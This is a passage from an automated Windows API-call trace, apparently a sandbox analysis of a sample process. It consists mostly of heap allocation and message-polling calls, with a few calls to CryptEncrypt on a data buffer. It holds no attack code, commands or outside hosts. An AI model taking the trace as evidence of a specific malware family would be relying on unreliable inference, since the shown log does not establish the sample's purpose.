hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0134.900] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.900] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.900] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0134.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0134.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0134.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0134.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0134.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0134.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0134.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0134.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0134.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0134.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0134.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0134.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0134.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13800) returned 0x2eb3b48 [0134.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0134.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0134.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0134.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50b78 [0134.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0134.908] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13800, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13808) returned 1 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0134.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0134.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0134.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0134.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0134.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0134.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0134.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0134.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0134.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0134.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0134.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.913] 